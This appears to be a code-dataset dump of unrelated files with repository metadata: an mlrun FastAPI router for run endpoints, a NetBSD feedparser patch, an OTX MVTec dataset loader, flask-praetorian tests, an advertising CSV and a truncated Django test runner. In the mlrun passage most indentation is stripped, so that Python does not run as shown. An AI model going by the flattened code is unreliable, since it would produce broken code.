mlrun.common.schemas.AuthorizationAction.store,
auth_info,
)
data = None
try:
data = await request.json()
except ValueError:
log_and_raise(HTTPStatus.BAD_REQUEST.value, reason="bad JSON body")
await run_in_threadpool(
mlrun.api.crud.Runs().store_run,
db_session,
data,
uid,
iter,
project,
)
return {}
# TODO: remove /run/{project}/{uid} in 1.7.0
@router.patch(
"/run/{project}/{uid}",
deprecated=True,
description="/run/{project}/{uid} is deprecated in 1.5.0 and will be removed in 1.7.0, "
"use /projects/{project}/runs/{uid} instead",
)
@router.patch("/projects/{project}/runs/{uid}")
async def update_run(
request: Request,
project: str,
uid: str,
iter: int = 0,
auth_info: mlrun.common.schemas.AuthInfo = Depends(deps.authenticate_request),
db_session: Session = Depends(deps.get_db_session),
):
await mlrun.api.utils.auth.verifier.AuthVerifier().query_project_resource_permissions(
mlrun.common.schemas.AuthorizationResourceTypes.run,
project,
uid,
mlrun.common.schemas.AuthorizationAction.update,
auth_info,
)
data = None
try:
data = await request.json()
except ValueError:
log_and_raise(HTTPStatus.BAD_REQUEST.value, reason="bad JSON body")
await run_in_threadpool(
mlrun.api.crud.Runs().update_run,
db_session,
project,
uid,
iter,
data,
)
return {}
# TODO: remove /run/{project}/{uid} in 1.7.0
@router.get(
"/run/{project}/{uid}",
deprecated=True,
description="/run/{project}/{uid} is deprecated in 1.5.0 and will be removed in 1.7.0, "
"use /projects/{project}/runs/{uid} instead",
)
@router.get("/projects/{project}/runs/{uid}")
async def get_run(
project: str,
uid: str,
iter: int = 0,
auth_info: mlrun.common.schemas.AuthInfo = Depends(deps.authenticate_request),
db_session: Session = Depends(deps.get_db_session),
):
data = await run_in_threadpool(
mlrun.api.crud.Runs().get_run, db_session, uid, iter, project
)
await mlrun.api.utils.auth.verifier.AuthVerifier().query_project_resource_permissions(
mlrun.common.schemas.AuthorizationResourceTypes.run,
project,
uid,
mlrun.common.schemas.AuthorizationAction.read,
auth_info,
)
return {
"data": data,
}
# TODO: remove /run/{project}/{uid} in 1.7.0
@router.delete(
"/run/{project}/{uid}",
deprecated=True,
description="/run/{project}/{uid} is deprecated in 1.5.0 and will be removed in 1.7.0, "
"use /projects/{project}/runs/{uid} instead",
)
@router.delete("/projects/{project}/runs/{uid}")
async def delete_run(
project: str,
uid: str,
iter: int = 0,
auth_info: mlrun.common.schemas.AuthInfo = Depends(deps.authenticate_request),
db_session: Session = Depends(deps.get_db_session),
):
await mlrun.api.utils.auth.verifier.AuthVerifier().query_project_resource_permissions(
mlrun.common.schemas.AuthorizationResourceTypes.run,
project,
uid,
mlrun.common.schemas.AuthorizationAction.delete,
auth_info,
)
await run_in_threadpool(
mlrun.api.crud.Runs().delete_run,
db_session,
uid,
iter,
project,
)
return {}
# TODO: remove /runs in 1.7.0
@router.get(
"/runs",
deprecated=True,
description="/runs is deprecated in 1.5.0 and will be removed in 1.7.0, "
"use /projects/{project}/runs/{uid} instead",
)
@router.get("/projects/{project}/runs")
async def list_runs(
project: str = None,
name: str = None,
uid: List[str] = Query([]),
labels: List[str] = Query([], alias="label"),
state: str = None,
last: int = 0,
sort: bool = True,
iter: bool = True,
start_time_from: str = None,
start_time_to: str = None,
last_update_time_from: str = None,
last_update_time_to: str = None,
partition_by: mlrun.common.schemas.RunPartitionByField = Query(
None, alias="partition-by"
),
rows_per_partition: int = Query(1, alias="rows-per-partition", gt=0),
partition_sort_by: mlrun.common.schemas.SortField = Query(
None, alias="partition-sort-by"
),
partition_order: mlrun.common.schemas.OrderType = Query(
mlrun.common.schemas.OrderType.desc, alias="partition-order"
),
max_partitions: int = Query(0, alias="max-partitions", ge=0),
with_notifications: bool = Query(False, alias="with-notifications"),
auth_info: mlrun.common.schemas.AuthInfo = Depends(deps.authenticate_request),
db_session: Session = Depends(deps.get_db_session),
):
if project != "*":
await mlrun.api.utils.auth.verifier.AuthVerifier().query_project_permissions(
project,
mlrun.common.schemas.AuthorizationAction.read,
auth_info,
)
if (
not name
and not uid
and not project
and not labels
and not state
and not last
and not start_time_from
and not start_time_to
and not last_update_time_from
and not last_update_time_to
):
# default to last week on no filter
start_time_from = (
datetime.datetime.now() - datetime.timedelta(days=7)
).isoformat()
partition_by = mlrun.common.schemas.RunPartitionByField.name
partition_sort_by = mlrun.common.schemas.SortField.updated
runs = await run_in_threadpool(
mlrun.api.crud.Runs().list_runs,
db_session,
name,
uid,
project,
labels,
[state] if state is not None else None,
sort,
last,
iter,
datetime_from_iso(start_time_from),
datetime_from_iso(start_time_to),
datetime_from_iso(last_update_time_from),
datetime_from_iso(last_update_time_to),
partition_by,
rows_per_partition,
partition_sort_by,
partition_order,
max_partitions,
with_notifications=with_notifications,
)
filtered_runs = await mlrun.api.utils.auth.verifier.AuthVerifier().filter_project_resources_by_permissions(
mlrun.common.schemas.AuthorizationResourceTypes.run,
runs,
lambda run: (
run.get("metadata", {}).get("project", mlrun.mlconf.default_project),
run.get("metadata", {}).get("uid"),
),
auth_info,
)
return {
"runs": filtered_runs,
}
# TODO: remove /runs in 1.7.0
@router.delete(
"/runs",
deprecated=True,
description="/runs is deprecated in 1.5.0 and will be removed in 1.7.0, "
"use /projects/{project}/runs/{uid} instead",
)
@router.delete("/projects/{project}/runs")
async def delete_runs(
project: str = None,
name: str = None,
labels: List[str] = Query([], alias="label"),
state: str = None,
days_ago: int = None,
auth_info: mlrun.common.schemas.AuthInfo = Depends(deps.authenticate_request),
db_session: Session = Depends(deps.get_db_session),
):
if not project or project != "*":
        # Currently we don't differentiate between run permissions within a project,
        # so there is no reason at the moment to query the permission for each run under the project.
        # TODO: check every run once we manage permissions per run within a project.
await mlrun.api.utils.auth.verifier.AuthVerifier().query_project_resource_permissions(
mlrun.common.schemas.AuthorizationResourceTypes.run,
project or mlrun.mlconf.default_project,
"",
mlrun.common.schemas.AuthorizationAction.delete,
auth_info,
)
else:
start_time_from = None
if days_ago:
start_time_from = datetime.datetime.now(
datetime.timezone.utc
) - datetime.timedelta(days=days_ago)
runs = await run_in_threadpool(
mlrun.api.crud.Runs().list_runs,
db_session,
name,
project=project,
labels=labels,
states=[state] if state is not None else None,
start_time_from=start_time_from,
)
projects = set(
run.get("metadata", {}).get("project", mlrun.mlconf.default_project)
for run in runs
)
for run_project in projects:
            # Currently we fail if the user doesn't have permission to delete runs in one of the projects in the system.
            # TODO: delete only runs from projects that the user has permission to delete from.
await mlrun.api.utils.auth.verifier.AuthVerifier().query_project_resource_permissions(
mlrun.common.schemas.AuthorizationResourceTypes.run,
run_project,
"",
mlrun.common.schemas.AuthorizationAction.delete,
auth_info,
)
await run_in_threadpool(
mlrun.api.crud.Runs().delete_runs,
db_session,
name,
project,
labels,
state,
days_ago,
)
return {}
@router.put(
"/projects/{project}/runs/{uid}/notifications",
status_code=HTTPStatus.OK.value,
)
async def set_run_notifications(
project: str,
uid: str,
set_notifications_request: mlrun.common.schemas.SetNotificationRequest = Body(...),
auth_info: mlrun.common.schemas.AuthInfo = Depends(
mlrun.api.api.deps.authenticate_request
),
db_session: Session = Depends(mlrun.api.api.deps.get_db_session),
):
await run_in_threadpool(
mlrun.api.utils.singletons.project_member.get_project_member().ensure_project,
db_session,
project,
auth_info=auth_info,
)
# check permission per object type
await mlrun.api.utils.auth.verifier.AuthVerifier().query_project_resource_permissions(
mlrun.common.schemas.AuthorizationResourceTypes.run,
project,
resource_name=uid,
action=mlrun.common.schemas.AuthorizationAction.update,
auth_info=auth_info,
)
await run_in_threadpool(
mlrun.api.crud.Notifications().set_object_notifications,
db_session,
auth_info,
project,
set_notifications_request.notifications,
mlrun.common.schemas.RunIdentifier(uid=uid),
)
return Response(status_code=HTTPStatus.OK.value)
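# ------------------------------------------------------------------
# Illustrative client-side sketch (not part of this router module):
# the decorators above mount plain REST routes, so listing a project's
# runs is a GET against /projects/{project}/runs. The base URL, API
# prefix, and the absence of auth below are assumptions made only for
# this example.
def _example_list_runs_client(base_url: str = "http://localhost:8080/api/v1") -> list:
    import requests  # assumed available in the client environment

    resp = requests.get(
        f"{base_url}/projects/my-project/runs",
        params={"state": "running", "label": "kind=job"},
    )
    resp.raise_for_status()
    # The endpoint returns {"runs": [...]}, as constructed in list_runs above.
    return resp.json()["runs"]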
|
2b3ddf1bb6dbac828d7e3151e3cbd04aeac36d61
|
376e1818d427b5e4d32fa6dd6c7b71e9fd88afdb
|
/textproc/py-feedparser5/patches/patch-feedparser_feedparser.py
|
e9599bbdb4c07646c286810a9583f83d928e702c
|
[] |
no_license
|
NetBSD/pkgsrc
|
a0732c023519650ef821ab89c23ab6ab59e25bdb
|
d042034ec4896cc5b47ed6f2e5b8802d9bc5c556
|
refs/heads/trunk
| 2023-09-01T07:40:12.138283
| 2023-09-01T05:25:19
| 2023-09-01T05:25:19
| 88,439,572
| 321
| 138
| null | 2023-07-12T22:34:14
| 2017-04-16T20:04:15
| null |
UTF-8
|
Python
| false
| false
| 824
|
py
|
patch-feedparser_feedparser.py
|
$NetBSD: patch-feedparser_feedparser.py,v 1.1 2021/08/19 19:21:00 nia Exp $
Fix compatibility with Python 3.9.
Backported from:
https://github.com/kurtmckee/feedparser/pull/206
https://bugzilla.redhat.com/show_bug.cgi?id=1807186
--- feedparser/feedparser.py.orig 2015-07-24 05:00:04.000000000 +0000
+++ feedparser/feedparser.py
@@ -90,7 +90,10 @@ except ImportError:
base64 = binascii = None
else:
# Python 3.1 deprecates decodestring in favor of decodebytes
- _base64decode = getattr(base64, 'decodebytes', base64.decodestring)
+ try:
+ _base64decode = base64.decodebytes
+ except AttributeError:
+ _base64decode = base64.decodestring
# _s2bytes: convert a UTF-8 str to bytes if the interpreter is Python 3
# _l2bytes: convert a list of ints to bytes if the interpreter is Python 3
|
857e6a96e4474b05695a7ddb4996494d9cda248e
|
6416b746ee71d897789eab1e450000831674dbd0
|
/src/otx/algorithms/anomaly/adapters/anomalib/data/mvtec.py
|
18f792445a9dc228f049df661a483e153ec02170
|
[
"Apache-2.0"
] |
permissive
|
openvinotoolkit/training_extensions
|
c921f83ad52311af96ff45ae0b88d0aecddd855b
|
80454808b38727e358e8b880043eeac0f18152fb
|
refs/heads/develop
| 2023-08-31T06:29:07.229339
| 2023-08-31T01:57:26
| 2023-08-31T01:57:26
| 154,843,614
| 397
| 230
|
Apache-2.0
| 2023-09-14T06:17:01
| 2018-10-26T14:02:29
|
Python
|
UTF-8
|
Python
| false
| false
| 6,963
|
py
|
mvtec.py
|
"""OTX MVTec Dataset facilitate OTX Anomaly Training.
License:
MVTec AD dataset is released under the Creative Commons
Attribution-NonCommercial-ShareAlike 4.0 International License
(CC BY-NC-SA 4.0)(https://creativecommons.org/licenses/by-nc-sa/4.0/).
Reference:
- Paul Bergmann, Kilian Batzner, Michael Fauser, David Sattlegger, Carsten Steger:
The MVTec Anomaly Detection Dataset: A Comprehensive Real-World Dataset for
Unsupervised Anomaly Detection; in: International Journal of Computer Vision
129(4):1038-1059, 2021, DOI: 10.1007/s11263-020-01400-4.
- Paul Bergmann, Michael Fauser, David Sattlegger, Carsten Steger: MVTec AD —
A Comprehensive Real-World Dataset for Unsupervised Anomaly Detection;
in: IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR),
9584-9592, 2019, DOI: 10.1109/CVPR.2019.00982.
"""
# Copyright (C) 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions
# and limitations under the License.
from pathlib import Path
from typing import List, Union
import cv2
import numpy as np
from anomalib.data.mvtec import make_mvtec_dataset
from pandas.core.frame import DataFrame
from otx.api.entities.annotation import (
Annotation,
AnnotationSceneEntity,
AnnotationSceneKind,
)
from otx.api.entities.color import Color
from otx.api.entities.dataset_item import DatasetItemEntity
from otx.api.entities.datasets import DatasetEntity
from otx.api.entities.id import ID
from otx.api.entities.image import Image
from otx.api.entities.label import Domain, LabelEntity
from otx.api.entities.model_template import TaskType
from otx.api.entities.scored_label import ScoredLabel
from otx.api.entities.shapes.rectangle import Rectangle
from otx.api.entities.subset import Subset
from otx.api.utils.segmentation_utils import create_annotation_from_segmentation_map
class OtxMvtecDataset:
"""Generate OTX MVTec Dataset from the anomaly detection datasets that follows the MVTec format.
Args:
path (Union[str, Path], optional): Path to the MVTec dataset category.
Defaults to "./datasets/MVTec/bottle".
split_ratio (float, optional): Ratio to split normal training images and add to the
test set in case test set doesn't contain any normal images.
Defaults to 0.5.
seed (int, optional): Random seed to ensure reproducibility when splitting. Defaults to 0.
create_validation_set (bool, optional): Create validation set from the test set by splitting
it to half. Default to True.
Examples:
>>> dataset_generator = OtxMvtecDataset()
>>> dataset = dataset_generator.generate()
>>> dataset[0].media.numpy.shape
(900, 900, 3)
"""
# pylint: disable=too-many-instance-attributes
def __init__(
self,
path: Union[str, Path],
task_type: TaskType = TaskType.ANOMALY_CLASSIFICATION,
):
self.path = path if isinstance(path, Path) else Path(path)
self.task_type = task_type
if self.task_type == TaskType.ANOMALY_CLASSIFICATION:
self.label_domain = Domain.ANOMALY_CLASSIFICATION
elif self.task_type == TaskType.ANOMALY_SEGMENTATION:
self.label_domain = Domain.ANOMALY_SEGMENTATION
self.normal_label = LabelEntity(name="Normal", domain=self.label_domain, id=ID(), color=Color(0, 255, 0))
self.abnormal_label = LabelEntity(
name="Anomalous",
domain=self.label_domain,
id=ID(),
is_anomalous=True,
color=Color(255, 0, 0),
)
self.label_map = {0: self.normal_label, 1: self.abnormal_label}
def get_samples(self) -> DataFrame:
"""Get MVTec samples.
Get MVTec samples in a pandas DataFrame. Update the certain columns
to match the OTX naming terminology. For example, column `split` is
renamed to `subset`. Labels are also renamed by creating their
        corresponding OTX LabelEntities.
Returns:
DataFrame: Final list of samples comprising all the required
information to create the OTX Dataset.
"""
samples = make_mvtec_dataset(root=self.path)
# Set the OTX SDK Splits
samples = samples.rename(columns={"split": "subset"})
samples.loc[samples.subset == "train", "subset"] = Subset.TRAINING
samples.loc[samples.subset == "val", "subset"] = Subset.VALIDATION
samples.loc[samples.subset == "test", "subset"] = Subset.TESTING
# Create and Set the OTX Labels
samples.loc[samples.label != "good", "label"] = self.abnormal_label
samples.loc[samples.label == "good", "label"] = self.normal_label
samples = samples.reset_index(drop=True)
return samples
def generate(self) -> DatasetEntity:
"""Generate OTX Anomaly Dataset.
Returns:
            DatasetEntity: Output OTX Anomaly Dataset generated from an MVTec-format dataset.
"""
samples = self.get_samples()
dataset_items: List[DatasetItemEntity] = []
for _, sample in samples.iterrows():
# Create image
image = Image(file_path=sample.image_path)
# Create annotation
if self.task_type == TaskType.ANOMALY_CLASSIFICATION or sample.label == self.normal_label:
shape = Rectangle(x1=0, y1=0, x2=1, y2=1)
labels = [ScoredLabel(sample.label)]
annotations = [Annotation(shape=shape, labels=labels)]
annotation_scene = AnnotationSceneEntity(annotations=annotations, kind=AnnotationSceneKind.ANNOTATION)
elif self.task_type == TaskType.ANOMALY_SEGMENTATION and sample.label == self.abnormal_label:
mask = (cv2.imread(sample.mask_path, cv2.IMREAD_GRAYSCALE) / 255).astype(np.uint8)
annotations = create_annotation_from_segmentation_map(mask, np.ones_like(mask), self.label_map)
annotation_scene = AnnotationSceneEntity(annotations=annotations, kind=AnnotationSceneKind.ANNOTATION)
else:
raise ValueError(f"Unknown task type: {self.task_type}")
# Create dataset item
dataset_item = DatasetItemEntity(media=image, annotation_scene=annotation_scene, subset=sample.subset)
# Add to dataset items
dataset_items.append(dataset_item)
dataset = DatasetEntity(items=dataset_items)
return dataset
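def example_generate_segmentation_dataset():
    """Hedged usage sketch, added for illustration only (not part of the
    original module): exercise the generator above for the segmentation task.
    The dataset path below is a placeholder and must exist locally."""
    generator = OtxMvtecDataset(
        path="./datasets/MVTec/bottle",
        task_type=TaskType.ANOMALY_SEGMENTATION,
    )
    dataset = generator.generate()
    # Mirrors the class docstring example: inspect the first item's media.
    print(dataset[0].media.numpy.shape)
    return dataset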
|
9029d8cb2472add1b26f1003c3ed5f91f8214188
|
ff1c4267608ed27711b6f4ee06327a2cf5ced17d
|
/tests/test_utilities.py
|
97515736e5a7f34258ded3bce0ba7144c3226ecf
|
[
"MIT"
] |
permissive
|
dusktreader/flask-praetorian
|
ce190fd0d6cd2050b2b882fcede42fcb78bc8bfe
|
32e614e0cd1374b3519144fbefe8e09f6162c813
|
refs/heads/master
| 2023-08-23T13:49:04.649111
| 2022-09-20T21:39:07
| 2022-09-20T21:39:07
| 74,596,218
| 370
| 81
|
MIT
| 2023-02-16T06:33:20
| 2016-11-23T16:47:18
|
Python
|
UTF-8
|
Python
| false
| false
| 5,626
|
py
|
test_utilities.py
|
import flask
import pendulum
import pytest
from flask_praetorian.utilities import (
add_jwt_data_to_app_context,
app_context_has_jwt_data,
remove_jwt_data_from_app_context,
current_user,
current_user_id,
current_rolenames,
current_custom_claims,
duration_from_string,
)
from flask_praetorian.exceptions import (
PraetorianError,
ConfigurationError,
)
class TestPraetorianUtilities:
def test_app_context_has_jwt_data(self):
"""
This test verifies that the app_context_has_jwt_data method can
determine if jwt_data has been added to the app context yet
"""
assert not app_context_has_jwt_data()
add_jwt_data_to_app_context({'a': 1})
assert app_context_has_jwt_data()
remove_jwt_data_from_app_context()
assert not app_context_has_jwt_data()
def test_remove_jwt_data_from_app_context(self):
"""
This test verifies that jwt data can be removed from an app context.
It also verifies that attempting to remove the data if it does not
exist there does not cause an exception
"""
jwt_data = {'a': 1}
add_jwt_data_to_app_context(jwt_data)
assert flask.g._flask_praetorian_jwt_data == jwt_data
remove_jwt_data_from_app_context()
assert not hasattr(flask.g, '_flask_praetorian_jwt_data')
remove_jwt_data_from_app_context()
def test_current_user_id(self, user_class, db, default_guard):
"""
This test verifies that the current user id can be successfully
determined based on jwt token data that has been added to the current
flask app's context.
"""
jwt_data = {}
add_jwt_data_to_app_context(jwt_data)
with pytest.raises(PraetorianError) as err_info:
current_user()
assert 'Could not fetch an id' in str(err_info.value)
jwt_data = {'id': 31}
add_jwt_data_to_app_context(jwt_data)
assert current_user_id() == 31
def test_current_user(self, user_class, db, default_guard):
"""
This test verifies that the current user can be successfully
determined based on jwt token data that has been added to the current
flask app's context.
"""
jwt_data = {}
add_jwt_data_to_app_context(jwt_data)
with pytest.raises(PraetorianError) as err_info:
current_user()
assert 'Could not fetch an id' in str(err_info.value)
jwt_data = {'id': 31}
add_jwt_data_to_app_context(jwt_data)
with pytest.raises(PraetorianError) as err_info:
current_user()
assert 'Could not identify the current user' in str(err_info.value)
the_dude = user_class(
id=13,
username='TheDude',
)
db.session.add(the_dude)
db.session.commit()
jwt_data = {'id': 13}
add_jwt_data_to_app_context(jwt_data)
assert current_user() is the_dude
def test_current_rolenames(self, user_class, db, default_guard):
"""
This test verifies that the rolenames attached to the current user
can be extracted from the jwt token data that has been added to the
current flask app's context
"""
jwt_data = {}
add_jwt_data_to_app_context(jwt_data)
assert current_rolenames() == set([
'non-empty-but-definitely-not-matching-subset'
])
jwt_data = {'rls': 'admin,operator'}
add_jwt_data_to_app_context(jwt_data)
assert current_rolenames() == set(['admin', 'operator'])
def test_current_custom_claims(self, user_class, db, default_guard):
"""
This test verifies that any custom claims attached to the current jwt
can be extracted from the jwt token data that has been added to the
current flask app's context
"""
jwt_data = dict(
id=13,
jti='whatever',
duder='brief',
el_duderino='not brief',
)
add_jwt_data_to_app_context(jwt_data)
assert current_custom_claims() == dict(
duder='brief',
el_duderino='not brief',
)
def test_duration_from_string_success(self):
"""
This test verifies that the duration_from_string method can be used to
parse a duration from a string with expected formats
"""
expected_duration = pendulum.duration(days=12, hours=1, seconds=1)
computed_duration = duration_from_string('12d1h1s')
assert computed_duration == expected_duration
expected_duration = pendulum.duration(months=1, hours=2, minutes=3)
computed_duration = duration_from_string('1 Month 2 Hours 3 minutes')
assert computed_duration == expected_duration
expected_duration = pendulum.duration(days=1, minutes=2, seconds=3)
computed_duration = duration_from_string('1day,2min,3sec')
assert computed_duration == expected_duration
expected_duration = pendulum.duration(months=1, minutes=2)
computed_duration = duration_from_string('1mo,2m')
assert computed_duration == expected_duration
def test_duration_from_string_fails(self):
"""
This test verifies that the duration_from_string method raises a
        ConfigurationError exception if there was a problem parsing the string
"""
with pytest.raises(ConfigurationError):
duration_from_string('12x1y1z')
with pytest.raises(ConfigurationError):
duration_from_string('')
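def example_protected_route(app):
    """Hedged usage sketch, added for illustration only (not part of the
    original test module): the utilities exercised above are normally consumed
    inside a route protected by flask-praetorian. A configured guard and user
    model are assumed to already be attached to ``app``."""
    import flask_praetorian

    @app.route('/whoami')
    @flask_praetorian.auth_required
    def whoami():
        # These helpers are the same ones imported at the top of this module.
        return {
            'id': current_user_id(),
            'username': current_user().username,
            'roles': sorted(current_rolenames()),
        }

    return whoami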
|
4c5cef02d9e84333d228702a1aa63f096ad88906
|
9d7506d03e4f07293143b2ee73a77c5b9ae0fc5a
|
/MachineLearning/LinearRegression/Application/Advertising.csv
|
1d7bf8eaeec1a9aa1bddd8e64d9408b543012bc9
|
[
"MIT"
] |
permissive
|
excelsimon/AI
|
52aa72157b5a548744539fbacd0cb60994ccf556
|
a54da940a1b47eb7d6fd921052932345eb12aeb2
|
refs/heads/master
| 2023-06-21T13:20:17.265234
| 2021-08-05T05:19:17
| 2021-08-05T05:19:17
| 103,625,033
| 130
| 40
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,756
|
csv
|
Advertising.csv
|
,TV,Radio,Newspaper,Sales
1,230.1,37.8,69.2,22.1
2,44.5,39.3,45.1,10.4
3,17.2,45.9,69.3,9.3
4,151.5,41.3,58.5,18.5
5,180.8,10.8,58.4,12.9
6,8.7,48.9,75,7.2
7,57.5,32.8,23.5,11.8
8,120.2,19.6,11.6,13.2
9,8.6,2.1,1,4.8
10,199.8,2.6,21.2,10.6
11,66.1,5.8,24.2,8.6
12,214.7,24,4,17.4
13,23.8,35.1,65.9,9.2
14,97.5,7.6,7.2,9.7
15,204.1,32.9,46,19
16,195.4,47.7,52.9,22.4
17,67.8,36.6,114,12.5
18,281.4,39.6,55.8,24.4
19,69.2,20.5,18.3,11.3
20,147.3,23.9,19.1,14.6
21,218.4,27.7,53.4,18
22,237.4,5.1,23.5,12.5
23,13.2,15.9,49.6,5.6
24,228.3,16.9,26.2,15.5
25,62.3,12.6,18.3,9.7
26,262.9,3.5,19.5,12
27,142.9,29.3,12.6,15
28,240.1,16.7,22.9,15.9
29,248.8,27.1,22.9,18.9
30,70.6,16,40.8,10.5
31,292.9,28.3,43.2,21.4
32,112.9,17.4,38.6,11.9
33,97.2,1.5,30,9.6
34,265.6,20,0.3,17.4
35,95.7,1.4,7.4,9.5
36,290.7,4.1,8.5,12.8
37,266.9,43.8,5,25.4
38,74.7,49.4,45.7,14.7
39,43.1,26.7,35.1,10.1
40,228,37.7,32,21.5
41,202.5,22.3,31.6,16.6
42,177,33.4,38.7,17.1
43,293.6,27.7,1.8,20.7
44,206.9,8.4,26.4,12.9
45,25.1,25.7,43.3,8.5
46,175.1,22.5,31.5,14.9
47,89.7,9.9,35.7,10.6
48,239.9,41.5,18.5,23.2
49,227.2,15.8,49.9,14.8
50,66.9,11.7,36.8,9.7
51,199.8,3.1,34.6,11.4
52,100.4,9.6,3.6,10.7
53,216.4,41.7,39.6,22.6
54,182.6,46.2,58.7,21.2
55,262.7,28.8,15.9,20.2
56,198.9,49.4,60,23.7
57,7.3,28.1,41.4,5.5
58,136.2,19.2,16.6,13.2
59,210.8,49.6,37.7,23.8
60,210.7,29.5,9.3,18.4
61,53.5,2,21.4,8.1
62,261.3,42.7,54.7,24.2
63,239.3,15.5,27.3,15.7
64,102.7,29.6,8.4,14
65,131.1,42.8,28.9,18
66,69,9.3,0.9,9.3
67,31.5,24.6,2.2,9.5
68,139.3,14.5,10.2,13.4
69,237.4,27.5,11,18.9
70,216.8,43.9,27.2,22.3
71,199.1,30.6,38.7,18.3
72,109.8,14.3,31.7,12.4
73,26.8,33,19.3,8.8
74,129.4,5.7,31.3,11
75,213.4,24.6,13.1,17
76,16.9,43.7,89.4,8.7
77,27.5,1.6,20.7,6.9
78,120.5,28.5,14.2,14.2
79,5.4,29.9,9.4,5.3
80,116,7.7,23.1,11
81,76.4,26.7,22.3,11.8
82,239.8,4.1,36.9,12.3
83,75.3,20.3,32.5,11.3
84,68.4,44.5,35.6,13.6
85,213.5,43,33.8,21.7
86,193.2,18.4,65.7,15.2
87,76.3,27.5,16,12
88,110.7,40.6,63.2,16
89,88.3,25.5,73.4,12.9
90,109.8,47.8,51.4,16.7
91,134.3,4.9,9.3,11.2
92,28.6,1.5,33,7.3
93,217.7,33.5,59,19.4
94,250.9,36.5,72.3,22.2
95,107.4,14,10.9,11.5
96,163.3,31.6,52.9,16.9
97,197.6,3.5,5.9,11.7
98,184.9,21,22,15.5
99,289.7,42.3,51.2,25.4
100,135.2,41.7,45.9,17.2
101,222.4,4.3,49.8,11.7
102,296.4,36.3,100.9,23.8
103,280.2,10.1,21.4,14.8
104,187.9,17.2,17.9,14.7
105,238.2,34.3,5.3,20.7
106,137.9,46.4,59,19.2
107,25,11,29.7,7.2
108,90.4,0.3,23.2,8.7
109,13.1,0.4,25.6,5.3
110,255.4,26.9,5.5,19.8
111,225.8,8.2,56.5,13.4
112,241.7,38,23.2,21.8
113,175.7,15.4,2.4,14.1
114,209.6,20.6,10.7,15.9
115,78.2,46.8,34.5,14.6
116,75.1,35,52.7,12.6
117,139.2,14.3,25.6,12.2
118,76.4,0.8,14.8,9.4
119,125.7,36.9,79.2,15.9
120,19.4,16,22.3,6.6
121,141.3,26.8,46.2,15.5
122,18.8,21.7,50.4,7
123,224,2.4,15.6,11.6
124,123.1,34.6,12.4,15.2
125,229.5,32.3,74.2,19.7
126,87.2,11.8,25.9,10.6
127,7.8,38.9,50.6,6.6
128,80.2,0,9.2,8.8
129,220.3,49,3.2,24.7
130,59.6,12,43.1,9.7
131,0.7,39.6,8.7,1.6
132,265.2,2.9,43,12.7
133,8.4,27.2,2.1,5.7
134,219.8,33.5,45.1,19.6
135,36.9,38.6,65.6,10.8
136,48.3,47,8.5,11.6
137,25.6,39,9.3,9.5
138,273.7,28.9,59.7,20.8
139,43,25.9,20.5,9.6
140,184.9,43.9,1.7,20.7
141,73.4,17,12.9,10.9
142,193.7,35.4,75.6,19.2
143,220.5,33.2,37.9,20.1
144,104.6,5.7,34.4,10.4
145,96.2,14.8,38.9,11.4
146,140.3,1.9,9,10.3
147,240.1,7.3,8.7,13.2
148,243.2,49,44.3,25.4
149,38,40.3,11.9,10.9
150,44.7,25.8,20.6,10.1
151,280.7,13.9,37,16.1
152,121,8.4,48.7,11.6
153,197.6,23.3,14.2,16.6
154,171.3,39.7,37.7,19
155,187.8,21.1,9.5,15.6
156,4.1,11.6,5.7,3.2
157,93.9,43.5,50.5,15.3
158,149.8,1.3,24.3,10.1
159,11.7,36.9,45.2,7.3
160,131.7,18.4,34.6,12.9
161,172.5,18.1,30.7,14.4
162,85.7,35.8,49.3,13.3
163,188.4,18.1,25.6,14.9
164,163.5,36.8,7.4,18
165,117.2,14.7,5.4,11.9
166,234.5,3.4,84.8,11.9
167,17.9,37.6,21.6,8
168,206.8,5.2,19.4,12.2
169,215.4,23.6,57.6,17.1
170,284.3,10.6,6.4,15
171,50,11.6,18.4,8.4
172,164.5,20.9,47.4,14.5
173,19.6,20.1,17,7.6
174,168.4,7.1,12.8,11.7
175,222.4,3.4,13.1,11.5
176,276.9,48.9,41.8,27
177,248.4,30.2,20.3,20.2
178,170.2,7.8,35.2,11.7
179,276.7,2.3,23.7,11.8
180,165.6,10,17.6,12.6
181,156.6,2.6,8.3,10.5
182,218.5,5.4,27.4,12.2
183,56.2,5.7,29.7,8.7
184,287.6,43,71.8,26.2
185,253.8,21.3,30,17.6
186,205,45.1,19.6,22.6
187,139.5,2.1,26.6,10.3
188,191.1,28.7,18.2,17.3
189,286,13.9,3.7,15.9
190,18.7,12.1,23.4,6.7
191,39.5,41.1,5.8,10.8
192,75.5,10.8,6,9.9
193,17.2,4.1,31.6,5.9
194,166.8,42,3.6,19.6
195,149.7,35.6,6,17.3
196,38.2,3.7,13.8,7.6
197,94.2,4.9,8.1,9.7
198,177,9.3,6.4,12.8
199,283.6,42,66.2,25.5
200,232.1,8.6,8.7,13.4
|
4acc70d943e1d1d3554b9d872b6f93ab6b8f1398
|
c882c16e1c42974f2744a79738bde155acc985b6
|
/runtests.py
|
3baf7e6fd799481e5172f14436e0eba109dcf328
|
[
"MIT"
] |
permissive
|
nitely/Spirit
|
4e4f1615a990ec8174f71ab66c64de5c4e599107
|
9a304a57de021108d9225b87f35ad6395d5d56d3
|
refs/heads/master
| 2023-06-09T02:09:47.275554
| 2023-05-24T09:19:48
| 2023-05-24T09:19:48
| 19,626,318
| 1,049
| 391
|
MIT
| 2023-08-20T05:34:25
| 2014-05-09T21:31:33
|
Python
|
UTF-8
|
Python
| false
| false
| 1,048
|
py
|
runtests.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import sys
import logging
import django
from django.test.runner import DiscoverRunner
os.environ['DJANGO_SETTINGS_MODULE'] = 'project.project.settings.test'
def setup_celery():
try:
from celery import Celery
except ImportError:
return
app = Celery('test')
app.config_from_object('django.conf:settings', namespace='CELERY')
app.autodiscover_tasks()
def log_warnings():
logger = logging.getLogger('py.warnings')
handler = logging.StreamHandler()
logger.addHandler(handler)
def run_tests(reverse=False):
sys.stdout.write(
"\nRunning spirit test suite, using settings %(settings)r\n\n" %
{"settings": os.environ['DJANGO_SETTINGS_MODULE']})
